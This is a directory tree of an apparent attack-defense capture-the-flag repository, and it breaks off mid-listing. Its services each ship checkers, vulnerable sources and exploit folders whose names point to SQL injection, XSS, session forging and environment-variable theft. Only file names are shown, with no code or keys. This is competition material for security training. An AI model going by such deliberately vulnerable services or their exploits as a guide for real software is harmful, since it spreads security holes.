├── LICENSE ├── README.md ├── aquaeductus ├── README.md ├── checkers │ ├── .gitignore │ ├── checker1 │ │ ├── Dockerfile │ │ ├── Network.py │ │ ├── README.md │ │ ├── WeatherReport.py │ │ ├── checker.py │ │ ├── docker-compose.yaml │ │ └── requirements.txt │ └── checker2 │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── checker.py │ │ ├── docker-compose.yaml │ │ └── requirements.txt ├── dist │ ├── README.md │ ├── docker-compose.yml │ └── src │ │ ├── Dockerfile │ │ ├── controllers │ │ ├── auth.go │ │ ├── garden.go │ │ ├── index.go │ │ ├── inference.go │ │ ├── watering.go │ │ └── weather.go │ │ ├── go.mod │ │ ├── go.sum │ │ ├── main.go │ │ ├── middlewares │ │ ├── auth.go │ │ ├── errors.go │ │ └── session.go │ │ ├── models │ │ ├── config.go │ │ ├── garden.go │ │ └── user.go │ │ ├── network │ │ ├── layers.go │ │ ├── permutation.go │ │ ├── random.go │ │ └── wasm.go │ │ ├── public │ │ └── assets │ │ │ ├── aquaeductus.jpg │ │ │ ├── bulma.css │ │ │ └── custom.css │ │ ├── release.wasm │ │ ├── secrets.go │ │ └── views │ │ ├── auth.html │ │ ├── desert.html │ │ ├── footer.html │ │ ├── gardens.html │ │ ├── gardens_create.html │ │ ├── gardens_details.html │ │ ├── gardens_watering.html │ │ ├── gardens_weather.html │ │ ├── header.html │ │ └── index.html ├── exploits │ ├── .gitignore │ ├── README.md │ ├── exploit1_1.py │ ├── exploit1_1_network.txt │ ├── exploit1_2.py │ ├── exploit2_1.py │ ├── exploit2_2.py │ ├── exploit2_2_network.txt │ ├── exploit2_3.py │ ├── exploit2_3_network.txt │ └── requirements.txt ├── meta.env └── wasm │ ├── .dockerignore │ ├── .gitignore │ ├── .prettierrc.json │ ├── Dockerfile │ ├── asconfig.json │ ├── assembly │ ├── index.ts │ ├── rpc.ts │ └── tsconfig.json │ ├── build.sh │ ├── package-lock.json │ └── package.json ├── blinkygram ├── .clang-format ├── .gitignore ├── README.md ├── blinkygram.png ├── checkers │ ├── README.md │ ├── checker1 │ │ ├── Dockerfile │ │ ├── bot_client.py │ │ ├── checker.py │ │ ├── checker_rand.py │ │ ├── checker_util.py │ │ ├── client.py │ 
│ ├── docker-compose.yml │ │ ├── protocol.py │ │ └── requirements.txt │ └── checker2 │ │ ├── Dockerfile │ │ ├── bot_client.py │ │ ├── checker.py │ │ ├── checker_rand.py │ │ ├── checker_util.py │ │ ├── client.py │ │ ├── docker-compose.yml │ │ ├── protocol.py │ │ └── requirements.txt ├── dist │ ├── README.md │ ├── bot │ │ ├── Dockerfile │ │ └── bot │ ├── client │ │ ├── client.py │ │ └── protocol.py │ ├── docker-compose.yml │ └── server │ │ ├── Dockerfile │ │ ├── auth.py │ │ ├── database.py │ │ ├── globals.py │ │ ├── handlers.py │ │ ├── main.py │ │ ├── protocol.py │ │ ├── requirements.txt │ │ └── utils.py ├── exploits │ ├── README.md │ ├── attacker.py │ ├── bot_client.py │ ├── client.py │ ├── exploit1.py │ ├── exploit2.py │ ├── exploit3.py │ ├── exploit4.py │ ├── exploit5.py │ ├── exploit6.py │ ├── protocol.py │ └── requirements.txt ├── meta.env └── src │ ├── .gitignore │ ├── Dockerfile │ ├── Makefile │ ├── README.md │ ├── build.sh │ ├── src │ ├── bot │ │ ├── bot.c │ │ ├── bot.h │ │ ├── chat.c │ │ ├── chat.h │ │ ├── client.c │ │ ├── client.h │ │ ├── crypto.c │ │ ├── crypto.h │ │ ├── main.c │ │ ├── protocol.c │ │ ├── protocol.h │ │ ├── storage.c │ │ ├── storage.h │ │ ├── util.c │ │ └── util.h │ ├── common │ │ ├── bot_client.py │ │ ├── checker_rand.py │ │ ├── checker_util.py │ │ ├── client.py │ │ └── protocol.py │ ├── dist │ │ └── README.md │ ├── docker │ │ ├── Dockerfile.bot │ │ ├── Dockerfile.server │ │ └── docker-compose.yml │ └── server │ │ ├── auth.py │ │ ├── database.py │ │ ├── globals.py │ │ ├── handlers.py │ │ ├── main.py │ │ ├── requirements.txt │ │ └── utils.py │ ├── test │ ├── bench_bot.py │ ├── bench_server.py │ ├── benchlib.py │ └── test.py │ └── tools │ └── chat.py ├── cantina ├── README.md ├── cantina.png ├── checkers │ ├── checker1 │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── checker.py │ │ ├── docker-compose.yaml │ │ └── requirements.txt │ ├── checker2 │ │ ├── .gitkeep │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── checker.py │ │ ├── docker-compose.yaml │ 
│ ├── music │ │ │ └── cantina.vgm │ │ ├── requirements.txt │ │ └── vgm │ │ │ ├── __init__.py │ │ │ ├── instruction.py │ │ │ └── parser.py │ ├── common │ │ ├── cantina │ │ │ ├── .gitignore │ │ │ ├── cantina │ │ │ │ ├── __init__.py │ │ │ │ ├── canopy │ │ │ │ │ ├── .dockerignore │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── client.py │ │ │ │ │ ├── fields.py │ │ │ │ │ ├── messages.py │ │ │ │ │ ├── server.py │ │ │ │ │ └── session.py │ │ │ │ ├── cipher.py │ │ │ │ ├── kex │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── exchange_server.py │ │ │ │ │ └── key_exchange.py │ │ │ │ ├── powcheck │ │ │ │ │ └── powcheck.py │ │ │ │ └── tocan │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── gateway.py │ │ │ │ │ ├── message.py │ │ │ │ │ └── tocan.py │ │ │ ├── examples │ │ │ │ └── canopy.py │ │ │ └── setup.py │ │ ├── cantinautils │ │ │ ├── fileflow.py │ │ │ ├── filetest.py │ │ │ └── orderflow.py │ │ ├── gateway.py │ │ └── message-ids.yaml │ └── shared │ │ └── gen_static_keys.py ├── dist │ ├── README.md │ ├── docker-compose.yml │ ├── gateway │ │ ├── Dockerfile │ │ └── gateway │ ├── jukebox-front │ │ ├── Dockerfile │ │ ├── cleanup.py │ │ ├── main.py │ │ ├── requirements.txt │ │ ├── run.sh │ │ ├── schema.sql │ │ ├── static │ │ │ ├── assets │ │ │ │ └── jukebox.jpg │ │ │ ├── css │ │ │ │ ├── custom.css │ │ │ │ └── pico.min.css │ │ │ ├── index.html │ │ │ └── js │ │ │ │ ├── index.js │ │ │ │ ├── nav │ │ │ │ ├── AbstractNav.js │ │ │ │ ├── Auth.js │ │ │ │ └── UnAuth.js │ │ │ │ └── views │ │ │ │ ├── AbstractView.js │ │ │ │ ├── FileListing.js │ │ │ │ ├── FileUpload.js │ │ │ │ ├── Login.js │ │ │ │ ├── Main.js │ │ │ │ └── Register.js │ │ └── vgm │ │ │ ├── __init__.py │ │ │ ├── instruction.py │ │ │ ├── parser.py │ │ │ ├── player.py │ │ │ └── vgm_parser.py │ ├── jukebox-proxy │ │ ├── Dockerfile │ │ ├── jukebox-proxy │ │ └── static │ │ │ └── cantina.vgm │ ├── keyserver │ │ ├── Dockerfile │ │ └── ksv │ ├── messages.py │ ├── orderdb │ │ ├── Dockerfile │ │ └── odb │ ├── pos │ │ ├── Dockerfile │ │ ├── order-items.yaml │ │ ├── pos 
│ │ └── static │ │ │ ├── assets │ │ │ ├── cantina.jpg │ │ │ └── img │ │ │ │ ├── bacon.jpg │ │ │ │ ├── carbonara.jpg │ │ │ │ ├── cheese.jpg │ │ │ │ ├── double.jpg │ │ │ │ ├── funghi.jpg │ │ │ │ ├── hawaii.jpg │ │ │ │ ├── hawaii_lavish.jpg │ │ │ │ ├── pomodoro.jpg │ │ │ │ ├── reaper.jpg │ │ │ │ ├── rigatoni.jpg │ │ │ │ ├── special.jpg │ │ │ │ ├── tonno.jpg │ │ │ │ └── tortelloni.jpg │ │ │ ├── css │ │ │ ├── custom.css │ │ │ └── pico.min.css │ │ │ ├── index.html │ │ │ └── js │ │ │ ├── index.js │ │ │ └── views │ │ │ ├── AbstractView.js │ │ │ ├── Main.js │ │ │ ├── Menu.js │ │ │ ├── Order.js │ │ │ └── Ticket.js │ ├── userdb-back │ │ ├── Dockerfile │ │ ├── cleanup.py │ │ ├── main.py │ │ ├── requirements.txt │ │ ├── run.sh │ │ └── schema.sql │ └── userdb-proxy │ │ ├── Dockerfile │ │ └── userdb-proxy ├── exploits │ ├── .gitignore │ ├── .gitkeep │ ├── 00-hardcoded_key.py │ ├── 01-can_filter.py │ ├── 02-rand.py │ ├── go-randgen │ │ ├── exploit-rand │ │ ├── go.mod │ │ └── rand.go │ ├── jukebox │ │ ├── cantina │ │ ├── cantinautils │ │ │ └── orderflow.py │ │ └── orderflow.py │ ├── requirements.txt │ └── util.py ├── meta.env └── src │ ├── .gitignore │ ├── components │ ├── .dockerignore │ ├── .gitignore │ ├── builder.sh │ ├── client │ │ ├── connect.go │ │ ├── connector │ │ │ └── connector.go │ │ ├── go.mod │ │ ├── go.sum │ │ ├── main.go │ │ ├── nes │ │ │ ├── README.md │ │ │ ├── apu.go │ │ │ ├── controller.go │ │ │ ├── filter.go │ │ │ └── palette.go │ │ └── player │ │ │ ├── audio.go │ │ │ ├── director.go │ │ │ └── run.go │ ├── docker-compose.yml │ ├── gateway │ │ ├── .gitignore │ │ ├── Dockerfile │ │ ├── go.mod │ │ ├── go.sum │ │ ├── main.go │ │ └── proxy │ │ │ ├── canproxy.go │ │ │ ├── client.go │ │ │ └── message.go │ ├── gocommon │ │ ├── can │ │ │ ├── bus.go │ │ │ ├── consts.go │ │ │ └── message.go │ │ ├── canopy │ │ │ ├── client.go │ │ │ ├── fields │ │ │ │ ├── cipherdata.go │ │ │ │ ├── extradata.go │ │ │ │ ├── field.go │ │ │ │ ├── msglength.go │ │ │ │ ├── sequence.go │ │ │ │ └── 
session.go │ │ │ ├── messages │ │ │ │ ├── data.go │ │ │ │ ├── message.go │ │ │ │ └── start.go │ │ │ ├── server.go │ │ │ ├── server_session.go │ │ │ ├── session.go │ │ │ └── shared.go │ │ ├── cipher │ │ │ └── cipher.go │ │ ├── components │ │ │ └── components.go │ │ ├── go.mod │ │ ├── go.sum │ │ ├── kex │ │ │ ├── client.go │ │ │ └── server.go │ │ ├── pow │ │ │ └── pow.go │ │ ├── structs │ │ │ ├── order.go │ │ │ └── tickets.go │ │ └── tickets │ │ │ └── tickets.go │ ├── jukebox-front │ │ ├── Dockerfile │ │ ├── cleanup.py │ │ ├── main.py │ │ ├── requirements.txt │ │ ├── run.sh │ │ ├── schema.sql │ │ ├── static │ │ │ ├── assets │ │ │ │ └── jukebox.jpg │ │ │ ├── css │ │ │ │ ├── custom.css │ │ │ │ └── pico.min.css │ │ │ ├── index.html │ │ │ └── js │ │ │ │ ├── index.js │ │ │ │ ├── nav │ │ │ │ ├── AbstractNav.js │ │ │ │ ├── Auth.js │ │ │ │ └── UnAuth.js │ │ │ │ └── views │ │ │ │ ├── AbstractView.js │ │ │ │ ├── FileListing.js │ │ │ │ ├── FileUpload.js │ │ │ │ ├── Login.js │ │ │ │ ├── Main.js │ │ │ │ └── Register.js │ │ └── vgm │ │ │ ├── __init__.py │ │ │ ├── instruction.py │ │ │ └── parser.py │ ├── jukebox-proxy │ │ ├── Dockerfile │ │ ├── go.mod │ │ ├── go.sum │ │ ├── jukebox.go │ │ ├── jukebox │ │ │ ├── consts.go │ │ │ └── structs.go │ │ ├── remoteaccess │ │ │ └── remoteaccess.go │ │ ├── routes │ │ │ ├── context.go │ │ │ ├── proxy.go │ │ │ └── validate.go │ │ ├── static │ │ │ └── cantina.vgm │ │ ├── streamer │ │ │ └── streamer.go │ │ ├── structs │ │ │ └── structs.go │ │ └── tickets │ │ │ └── ticketmanager.go │ ├── keyserver │ │ ├── .gitignore │ │ ├── Dockerfile │ │ ├── go.mod │ │ ├── go.sum │ │ ├── keyserver.go │ │ ├── ks │ │ │ ├── consts.go │ │ │ └── structs.go │ │ └── tickets │ │ │ └── tickets.go │ ├── order-db │ │ ├── .gitignore │ │ ├── Dockerfile │ │ ├── go.mod │ │ ├── go.sum │ │ ├── odb │ │ │ ├── consts.go │ │ │ └── structs.go │ │ ├── order-db.go │ │ └── storage │ │ │ ├── creation.go │ │ │ └── pickup.go │ ├── point-of-sale │ │ ├── .gitignore │ │ ├── Dockerfile │ │ ├── 
go.mod │ │ ├── go.sum │ │ ├── order-items.yaml │ │ ├── point-of-sale.go │ │ ├── pos │ │ │ ├── consts.go │ │ │ ├── items.go │ │ │ └── structs.go │ │ └── routes │ │ │ ├── context.go │ │ │ ├── items.go │ │ │ ├── order.go │ │ │ ├── pow.go │ │ │ └── ticket.go │ ├── userdb-back │ │ ├── Dockerfile │ │ ├── cleanup.py │ │ ├── main.py │ │ ├── requirements.txt │ │ ├── run.sh │ │ └── schema.sql │ └── userdb-proxy │ │ ├── Dockerfile │ │ ├── go.mod │ │ ├── go.sum │ │ ├── proxy │ │ └── proxy.go │ │ ├── storage │ │ ├── creation.go │ │ └── pickup.go │ │ ├── udb │ │ ├── consts.go │ │ └── structs.go │ │ └── userdb.go │ └── conf │ └── message-ids.yaml ├── dewaste ├── .gitignore ├── README.md ├── checkers │ ├── checker1 │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── checker.py │ │ ├── dejavu.ttf │ │ ├── docker-compose.yaml │ │ ├── requirements.txt │ │ └── run-first-view-ticks.sh │ └── checker2 │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── checker.py │ │ ├── dejavu.ttf │ │ ├── docker-compose.yaml │ │ ├── requirements.txt │ │ └── run_dev.sh ├── dewaste.png ├── dist │ ├── README.md │ ├── db │ │ ├── Dockerfile │ │ └── schema.sql │ ├── docker-compose.yaml │ └── web │ │ ├── .dockerignore │ │ ├── Dockerfile │ │ ├── composer.json │ │ ├── composer.lock │ │ ├── docker │ │ ├── app-cron.sh │ │ └── entrypoint.sh │ │ ├── phpcs.xml │ │ ├── phpstan.neon │ │ └── src │ │ ├── .htaccess │ │ ├── App │ │ ├── AppRouter.php │ │ ├── Controllers │ │ │ ├── AppController.php │ │ │ ├── FAQController.php │ │ │ ├── RankingController.php │ │ │ ├── RecycleController.php │ │ │ └── UserController.php │ │ ├── Model │ │ │ ├── Analysis │ │ │ │ ├── AnalysisResult.php │ │ │ │ ├── AnalysisResultFactory.php │ │ │ │ ├── EMLAnalysisResult.php │ │ │ │ ├── FileAnalysisResult.php │ │ │ │ ├── IniAnalysisResult.php │ │ │ │ └── MailPartAnalysisResult.php │ │ │ ├── Container.php │ │ │ ├── Controller.php │ │ │ ├── DigitalItem.php │ │ │ ├── DigitalItemStatus.php │ │ │ ├── DuplicateEmailAddressException.php │ │ │ ├── 
DuplicateSerialNumberException.php │ │ │ ├── FAQ.php │ │ │ ├── PhysicalItem.php │ │ │ ├── PhysicalItemStatus.php │ │ │ ├── Redirection.php │ │ │ ├── Route.php │ │ │ └── User.php │ │ ├── Persistence │ │ │ ├── AnalysisResultDAO.php │ │ │ ├── DatabaseManager.php │ │ │ ├── DigitalItemDAO.php │ │ │ ├── FAQDAO.php │ │ │ ├── PDO.php │ │ │ ├── ParseResultsTrait.php │ │ │ ├── PhysicalItemDAO.php │ │ │ ├── QueryBuilder │ │ │ │ ├── AbstractClause.php │ │ │ │ ├── AlnumGenerator.php │ │ │ │ ├── AndClause.php │ │ │ │ ├── Clause.php │ │ │ │ ├── InsertStatement.php │ │ │ │ ├── OrClause.php │ │ │ │ ├── QueryBuilder.php │ │ │ │ ├── SelectStatement.php │ │ │ │ ├── UpdateStatement.php │ │ │ │ └── Value.php │ │ │ ├── StatsDAO.php │ │ │ └── UserDAO.php │ │ ├── Routes.php │ │ ├── Service │ │ │ ├── Analysis │ │ │ │ ├── AnalysisEngine.php │ │ │ │ ├── AnalysisMethod.php │ │ │ │ └── Methods │ │ │ │ │ ├── EmlAnalysisMethod.php │ │ │ │ │ ├── FileAnalysisMethod.php │ │ │ │ │ └── IniAnalysisMethod.php │ │ │ ├── DigitalItemRegistrationService.php │ │ │ ├── DigitalItemService.php │ │ │ ├── FileService.php │ │ │ ├── PasswordCheckingService.php │ │ │ ├── PhysicalItemRegistrationService.php │ │ │ ├── PhysicalItemService.php │ │ │ ├── RankingService.php │ │ │ ├── SessionService.php │ │ │ ├── UserCreationService.php │ │ │ └── UserLoginService.php │ │ └── UI │ │ │ └── Template.php │ │ ├── cli.php │ │ ├── common.php │ │ ├── config.php │ │ ├── css │ │ └── style.css │ │ ├── fonts │ │ ├── LDIxapCSOBg7S-QT7p4GM-aUWA.woff2 │ │ ├── LDIxapCSOBg7S-QT7p4HM-Y.woff2 │ │ ├── LDIxapCSOBg7S-QT7p4JM-aUWA.woff2 │ │ ├── m8JXjfVPf62XiF7kO-i9YL1la1OD.woff2 │ │ ├── m8JXjfVPf62XiF7kO-i9YLNlaw.woff2 │ │ └── pxiKyp0ihIEF2isfFJU.woff2 │ │ ├── img │ │ ├── founders.jpg │ │ └── hills.jpg │ │ ├── index.php │ │ ├── js │ │ ├── pyscript.min.js │ │ ├── pyscript.min.js.map │ │ ├── pyscript.py │ │ └── script.js │ │ ├── pages │ │ ├── about.html │ │ ├── analyze.html │ │ ├── faq.php │ │ ├── home.php │ │ ├── login.php │ │ ├── ranking.php │ │ 
├── recycle │ │ │ ├── account_registration.php │ │ │ ├── digital_registration_form.php │ │ │ ├── myitem_digital.php │ │ │ ├── myitem_physical.php │ │ │ ├── myitems_list.php │ │ │ ├── physical_registration_form.php │ │ │ └── registration_template.php │ │ └── template.php │ │ ├── py │ │ └── analyze.py │ │ ├── pyodide │ │ ├── distutils.tar │ │ ├── micropip-0.1-py3-none-any.whl │ │ ├── packaging-21.3-py3-none-any.whl │ │ ├── pyodide.asm.data │ │ ├── pyodide.asm.js │ │ ├── pyodide.asm.wasm │ │ ├── pyodide.js │ │ ├── pyodide.js.map │ │ ├── pyodide_py.tar │ │ ├── pyparsing-3.0.9-py3-none-any.whl │ │ └── repodata.json │ │ └── utils.php ├── exploits │ ├── README.md │ ├── broken_auth │ │ ├── Dockerfile │ │ ├── exploit.py │ │ └── run.sh │ ├── dom_xss_exception │ │ └── exploit.py │ ├── dom_xss_simple │ │ ├── dos_only.py │ │ └── exploit.py │ ├── dom_xss_zip_slip │ │ └── exploit.py │ ├── session-forging │ │ ├── Dockerfile │ │ ├── exploit.py │ │ └── run.sh │ ├── sqli_faq │ │ ├── Dockerfile │ │ ├── exploit.php │ │ └── run.sh │ ├── sqli_login │ │ ├── Dockerfile │ │ ├── exploit.py │ │ └── run.sh │ └── steal_env_variable │ │ ├── Dockerfile │ │ ├── exploit.py │ │ └── run.sh ├── meta.env ├── report_app │ ├── Dockerfile │ ├── docker-compose.yaml │ ├── gen_keys.py │ ├── pow_cracker.py │ ├── public_key.pem │ ├── report.py │ ├── requirements.txt │ ├── schema.sql │ ├── static │ │ └── css │ │ │ ├── custom.css │ │ │ └── pico.min.css │ └── templates │ │ ├── base.html │ │ ├── messages.html │ │ └── report.html └── vulnbot │ ├── Dockerfile │ ├── checker.py │ ├── dejavu.ttf │ ├── private_key.pem │ ├── requirements.txt │ └── run_dev.sh ├── hps ├── .gitignore ├── README.md ├── ca_stuff │ ├── ca.crt │ ├── ca.key │ ├── ca.srl │ ├── commander.crt │ ├── commander.csr │ ├── commander.key │ ├── regenerate.sh │ ├── server.crt │ ├── server.csr │ ├── server.key │ ├── smartmeter.crt │ ├── smartmeter.csr │ └── smartmeter.key ├── checkers │ ├── checker1 │ │ ├── Dockerfile │ │ ├── ca.crt │ │ ├── checker.py │ │ 
├── commander.crt │ │ ├── commander.key │ │ ├── docker-compose.yml │ │ └── requirements.txt │ └── checker2 │ │ ├── Dockerfile │ │ ├── ca.crt │ │ ├── checker.py │ │ ├── commander.crt │ │ ├── commander.key │ │ ├── docker-compose.yml │ │ ├── firmware_generator.py │ │ ├── firmware_utils.py │ │ ├── private.pem │ │ └── requirements.txt ├── dist │ ├── README.md │ ├── docker-compose.yml │ ├── mqtt │ │ ├── Dockerfile │ │ ├── acls.txt │ │ ├── certs │ │ │ ├── ca.crt │ │ │ ├── server.crt │ │ │ └── server.key │ │ ├── mosquitto.conf │ │ └── pw.file │ ├── smartmeter │ │ ├── Dockerfile │ │ ├── Smartmeter │ │ │ ├── __init__.py │ │ │ ├── asgi.py │ │ │ ├── settings.py │ │ │ ├── urls.py │ │ │ └── wsgi.py │ │ ├── ca.crt │ │ ├── custom_filename.html │ │ ├── manage.py │ │ ├── requirements.txt │ │ ├── smartmeter.crt │ │ ├── smartmeter.key │ │ ├── static │ │ │ ├── css │ │ │ │ ├── bootstrap-grid.css │ │ │ │ ├── bootstrap-grid.css.map │ │ │ │ ├── bootstrap-grid.min.css │ │ │ │ ├── bootstrap-grid.min.css.map │ │ │ │ ├── bootstrap-reboot.css │ │ │ │ ├── bootstrap-reboot.css.map │ │ │ │ ├── bootstrap-reboot.min.css │ │ │ │ ├── bootstrap-reboot.min.css.map │ │ │ │ ├── bootstrap.css │ │ │ │ ├── bootstrap.css.map │ │ │ │ ├── bootstrap.min.css │ │ │ │ └── bootstrap.min.css.map │ │ │ ├── fonts │ │ │ │ ├── Px437_IBM_EGA8.otf │ │ │ │ ├── arrow-down-black.svg │ │ │ │ ├── arrow-down-grayLight.svg │ │ │ │ ├── arrow-up-black.svg │ │ │ │ ├── arrow-up-grayLight.svg │ │ │ │ ├── checkbox-checked-black.svg │ │ │ │ ├── checkbox-checked-grayLight.svg │ │ │ │ ├── checkbox-unchecked-black.svg │ │ │ │ ├── checkbox-unchecked-grayLight.svg │ │ │ │ ├── grid-black.svg │ │ │ │ ├── grid-grayLight.svg │ │ │ │ ├── grid.svg │ │ │ │ ├── hyphen-black.svg │ │ │ │ ├── hyphen-grayLight.svg │ │ │ │ ├── left-brace-black.svg │ │ │ │ ├── left-brace-grayLight.svg │ │ │ │ ├── radio-checked-black.svg │ │ │ │ ├── radio-checked-grayLight.svg │ │ │ │ ├── radio-unchecked-black.svg │ │ │ │ ├── radio-unchecked-grayLight.svg │ │ │ │ ├── 
right-brace-black.svg │ │ │ │ ├── right-brace-grayLight.svg │ │ │ │ ├── shade-100-black.svg │ │ │ │ ├── shade-100-grayLight.svg │ │ │ │ ├── shade-25-black.svg │ │ │ │ ├── shade-25-grayLight.svg │ │ │ │ ├── shade-50-black.svg │ │ │ │ ├── shade-50-grayLight.svg │ │ │ │ ├── shade-75-black.svg │ │ │ │ └── shade-75-grayLight.svg │ │ │ └── js │ │ │ │ ├── bootstrap.bundle.js │ │ │ │ ├── bootstrap.bundle.js.map │ │ │ │ ├── bootstrap.bundle.min.js │ │ │ │ ├── bootstrap.bundle.min.js.map │ │ │ │ ├── bootstrap.js │ │ │ │ ├── bootstrap.js.map │ │ │ │ ├── bootstrap.min.js │ │ │ │ └── bootstrap.min.js.map │ │ ├── templates │ │ │ ├── _base.html │ │ │ ├── _navbar.html │ │ │ ├── _sample.html │ │ │ ├── current_readings.html │ │ │ ├── graph.html │ │ │ ├── graph_html.html │ │ │ ├── index.html │ │ │ ├── settings.html │ │ │ ├── warnings.html │ │ │ └── work_in_progress.html │ │ └── web │ │ │ ├── __init__.py │ │ │ ├── admin.py │ │ │ ├── apps.py │ │ │ ├── bokeh_style.yml │ │ │ ├── migrations │ │ │ ├── 0001_initial.py │ │ │ └── __init__.py │ │ │ ├── models.py │ │ │ ├── tests.py │ │ │ ├── urls.py │ │ │ └── views.py │ └── valve │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── commands.log │ │ ├── configuration.py │ │ ├── entry.sh │ │ ├── firmware_utils.py │ │ ├── mqtt_handler.py │ │ ├── pcaps │ │ └── debug.pcapng │ │ ├── public.pem │ │ ├── requirements.txt │ │ ├── settings.py │ │ ├── static │ │ └── logo.png │ │ ├── templates │ │ ├── _base.html │ │ ├── debug.html │ │ ├── firmware_upgrade.html │ │ ├── index.html │ │ └── logs.html │ │ └── version.py ├── exploits │ └── ECSC_valve_firmware_gen │ │ ├── a.c │ │ ├── a.out │ │ ├── b.out │ │ ├── firmware_generator.py │ │ ├── firmware_generator_exploit.py │ │ ├── firmware_utils.py │ │ ├── main.py │ │ ├── private.pem │ │ ├── public.pem │ │ ├── requirements.txt │ │ ├── test.bin │ │ ├── test_data.zip │ │ ├── test_data2.zip │ │ ├── test_exploit.bin │ │ └── version.py ├── hps.png └── meta.env ├── techbay ├── README.md ├── TechBay-Architecture.drawio ├── 
TechBay-Architecture.svg ├── backend-rust_code │ ├── .gitignore │ ├── Cargo.toml │ └── src │ │ ├── api_calls.rs │ │ ├── api_models.rs │ │ ├── auth.rs │ │ ├── data_access.rs │ │ ├── errors.rs │ │ ├── main.rs │ │ ├── models.rs │ │ ├── models │ │ └── users.rs │ │ ├── parser.rs │ │ ├── routes.rs │ │ └── schema.rs ├── build_backend-rust.sh ├── checkers │ ├── checker1 │ │ ├── .gitignore │ │ ├── Dockerfile │ │ ├── Gidole-Regular.ttf │ │ ├── Inconsolata-Regular.ttf │ │ ├── README.md │ │ ├── checker.py │ │ ├── docker-compose.yaml │ │ └── requirements.txt │ └── checker2 │ │ ├── .gitignore │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── checker.py │ │ ├── docker-compose.yaml │ │ └── requirements.txt ├── dist │ ├── README.md │ ├── backend-node │ │ ├── .dockerignore │ │ ├── .gitignore │ │ ├── docker │ │ │ └── Dockerfile │ │ ├── package.json │ │ ├── src │ │ │ ├── config.ts │ │ │ ├── controllers │ │ │ │ ├── profile.controller.ts │ │ │ │ ├── requests.controller.ts │ │ │ │ └── trading.controller.ts │ │ │ ├── db │ │ │ │ └── index.ts │ │ │ ├── index.ts │ │ │ ├── middlewares │ │ │ │ └── auth.middleware.ts │ │ │ ├── repositories │ │ │ │ ├── profile.repository.ts │ │ │ │ ├── requests.repository.ts │ │ │ │ └── trading.repository.ts │ │ │ └── types │ │ │ │ ├── helper.type.ts │ │ │ │ ├── profile.type.ts │ │ │ │ ├── request.type.ts │ │ │ │ └── trading.type.ts │ │ ├── tsconfig.json │ │ └── yarn.lock │ ├── backend-rust │ │ ├── backend-rust │ │ └── docker │ │ │ └── Dockerfile │ ├── database │ │ ├── Dockerfile │ │ └── schema.sql │ ├── docker-compose.yml │ ├── frontend │ │ ├── .dockerignore │ │ ├── .eslintrc.cjs │ │ ├── .gitignore │ │ ├── .prettierrc │ │ ├── .vimrc │ │ ├── .vscode │ │ │ └── extensions.json │ │ ├── README.md │ │ ├── docker │ │ │ └── Dockerfile │ │ ├── env.d.ts │ │ ├── index.html │ │ ├── package.json │ │ ├── public │ │ │ └── favicon.ico │ │ ├── src │ │ │ ├── App.vue │ │ │ ├── api │ │ │ │ ├── generated │ │ │ │ │ ├── .gitignore │ │ │ │ │ ├── .swagger-codegen-ignore │ │ │ │ │ ├── 
.swagger-codegen │ │ │ │ │ │ └── VERSION │ │ │ │ │ ├── api.ts │ │ │ │ │ ├── configuration.ts │ │ │ │ │ ├── custom.d.ts │ │ │ │ │ ├── git_push.sh │ │ │ │ │ └── index.ts │ │ │ │ └── index.ts │ │ │ ├── assets │ │ │ │ ├── base.css │ │ │ │ ├── css.css │ │ │ │ ├── css2.css │ │ │ │ ├── logo.svg │ │ │ │ ├── techbay-logo.ico │ │ │ │ ├── techbay-logo.svg │ │ │ │ └── techbay.jpg │ │ │ ├── components │ │ │ │ ├── Header.vue │ │ │ │ ├── OfferList.vue │ │ │ │ ├── RequestsList.vue │ │ │ │ └── Spinner.vue │ │ │ ├── main.ts │ │ │ ├── router │ │ │ │ └── index.ts │ │ │ ├── services │ │ │ │ ├── authentication.service.ts │ │ │ │ ├── index.ts │ │ │ │ ├── message-service.ts │ │ │ │ ├── profile.service.ts │ │ │ │ ├── request.service.ts │ │ │ │ ├── spinner.service.ts │ │ │ │ ├── time.service.ts │ │ │ │ └── trading.service.ts │ │ │ ├── stores │ │ │ │ └── user-store.ts │ │ │ └── views │ │ │ │ ├── AdminView.vue │ │ │ │ ├── HomeView.vue │ │ │ │ ├── LoginView.vue │ │ │ │ ├── MyProfileView.vue │ │ │ │ ├── MyRequestsView.vue │ │ │ │ ├── NewOfferView.vue │ │ │ │ ├── OfferView.vue │ │ │ │ ├── OffersView.vue │ │ │ │ ├── ProfileView.vue │ │ │ │ ├── RegisterView.vue │ │ │ │ └── RequestsView.vue │ │ ├── tsconfig.config.json │ │ ├── tsconfig.json │ │ ├── vite.config.ts │ │ └── yarn.lock │ └── proxy │ │ ├── Caddyfile │ │ └── Dockerfile ├── exploits │ ├── .gitignore │ ├── flagstore1 │ │ ├── exploit-hidden-lfi │ │ │ ├── exploit_lfi.py │ │ │ └── requirements.txt │ │ └── exploit-jwt-known-private-key │ │ │ ├── exploit_jwt.py │ │ │ └── requirements.txt │ └── flagstore2 │ │ ├── exploit-hidden-api │ │ ├── exploit.py │ │ └── requirements.txt │ │ ├── exploit-jwt-known-private-key │ │ ├── .gitignore │ │ ├── exploit.js │ │ ├── package.json │ │ └── yarn.lock │ │ └── exploit-sqli │ │ ├── exploit.py │ │ └── requirements.txt ├── meta.env ├── patches │ ├── flagstore2-vulnerability1.patch │ └── flagstore2-vulnerability2.patch └── techbay.png └── winds-of-the-past ├── .gitignore ├── README.md ├── checkers ├── checker1 │ 
